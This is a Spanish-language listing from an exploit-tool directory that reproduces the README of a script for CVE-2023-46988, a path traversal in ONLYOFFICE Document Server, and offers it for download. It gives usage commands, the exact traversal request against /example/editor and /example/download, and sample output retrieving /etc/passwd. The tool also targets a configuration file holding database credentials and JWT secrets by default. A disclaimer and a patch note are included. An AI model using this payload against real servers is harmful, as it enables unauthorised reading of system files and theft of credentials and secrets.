Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
OnlyOffice-path-traversal — CVE-2023-46988: Explotación de Path Traversal en ONLYOFFICE | Kitploit
Herramientas/GitHubGitHub/mihat2/onlyoffice-path-traversal
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubmihat2/onlyoffice-path-traversal

OnlyOffice-path-traversal

CVE-2023-46988: Explotación de Path Traversal en ONLYOFFICE

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Explotación de Path Traversal en ONLYOFFICE (CVE-2023-46988)

📌 Resumen

Este script explota una vulnerabilidad de path traversal en ONLYOFFICE Document Server (CVE-2023-46988) que permite a usuarios no autorizados copiar archivos arbitrarios del servidor. La vulnerabilidad existe en el endpoint /example/editor, donde el parámetro fileExt puede manipularse para acceder a archivos sensibles del sistema y de configuración.

⚠️ Aviso legal

Esta herramienta es solo para fines educativos y de investigación de seguridad autorizada.
El uso no autorizado contra sistemas sin permiso explícito es ilegal y poco ético.

🛠 Características

  • Recupera archivos sensibles por defecto:
    • /etc/passwd
    • /etc/onlyoffice/documentserver/local.json (contiene credenciales de base de datos y secretos JWT)
  • Especifica cualquier ruta de archivo para recuperarla con el argumento --file.
  • Admite proxy opcional para la interceptación con Burp Suite (--proxy).
  • Admite verificación SSL opcional (--verify).
  • Corrige problemas de codificación al descargar archivos con caracteres especiales.

🚀 Uso

1️⃣ Uso básico (recuperar archivos por defecto)

root@kitploit:~
python onlyoffice_exploit.py http://localhost

Esto recupera:

  • /etc/passwd
  • /etc/onlyoffice/documentserver/local.json

2️⃣ Recuperar un archivo personalizado (p. ej., /etc/hosts)

root@kitploit:~
python onlyoffice_exploit.py http://localhost --file /etc/hosts

3️⃣ Habilitar proxy (p. ej., Burp Suite en 127.0.0.1:8080)

root@kitploit:~
python onlyoffice_exploit.py http://localhost --proxy
root@kitploit:~
python onlyoffice_exploit.py http://localhost --proxy http://127.0.0.1:8080

4️⃣ Habilitar verificación SSL

root@kitploit:~
python onlyoffice_exploit.py https://example.local --verify

5️⃣ Combinar proxy y verificación SSL

root@kitploit:~
python onlyoffice_exploit.py https://example.local --file /etc/hosts --proxy --verify

🔍 Cómo funciona

  1. Envía una solicitud a /example/editor con un parámetro fileExt malicioso:
    root@kitploit:~
    GET /example/editor?fileExt=../../../../../../../../etc/passwd
    
  2. Extrae la URL de redirección de la respuesta.
  3. Analiza el nombre de archivo redirigido de la respuesta.
  4. Corrige problemas de codificación para caracteres especiales en nombres de archivo.
  5. Descarga el archivo desde /example/download?fileName=<extracted_filename>.

🛠 Ejemplo de salida

root@kitploit:~
[*] Target URL: http://localhost
[*] Attempting to retrieve: /etc/passwd
[*] Sending request to: http://localhost/example/editor?fileExt=../../../../../../../../etc/passwd
[+] Extracted Redirect URL: http://localhost/example/download?fileName=.passwd
[+] Extracted File Name: .passwd
[*] Downloading file: http://localhost/example/download?fileName=.passwd
[+] File downloaded successfully: .passwd

🔒 Mitigación

ONLYOFFICE ha parcheado esta vulnerabilidad en su actualización de febrero de 2024.
Los usuarios deben actualizar a la última versión para proteger sus servidores.

🐜 Licencia

Este proyecto está licenciado bajo la Licencia MIT – consulta el archivo LICENSE para más detalles.

Descargar herramienta